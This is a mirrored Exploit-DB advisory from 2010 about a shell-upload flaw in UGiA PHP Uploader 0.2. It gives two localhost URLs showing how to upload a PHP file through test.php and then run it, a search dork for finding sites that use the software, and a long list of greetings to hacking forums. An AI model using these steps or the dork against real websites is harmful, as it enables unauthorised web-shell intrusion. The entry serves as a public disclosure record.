UGiA PHP UPLOADER 0.2 – Arbitrary File Upload

  • 作者: indoushka
    日期: 2010-01-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11261/
  • ========================================================================================
    | # Title: UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability
    | # Author : indoushka 
    | # email: indoushka@hotmail.com 
    | # Home : www.iq-ty.com/vb 
    | # Script Home: sourceforge.net/projects/upu/files 
    | # Dork : Powered by UGiA PHP UPLOADER V0.2
    | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) 
    | # Bug: Shell Upload 
    ======================Exploit By indoushka =================================
    # Exploit: 
     
     1- http://127.0.0.1/upload/test.php
     
     2- http://127.0.0.1/upload/upu/files/76a61a51e512be4219080be04be34c04.php
     
    ================================ Dz-Ghost Team ========================================================
    Greetz : 
    Exploit-db Team (loneferret+Exploits+dookie2000ca)
    all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
    Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
    www.forums.ibb7.com * www.owned-m.com * Stake (v4-team.com) * www.dev-chat.com* Cyb3r IntRue (avengers team) 
    * www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc 
    * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me 
    www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net
    SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com
    www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org 
    r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net 
    ------------------------------------------------------------------------------------------------------------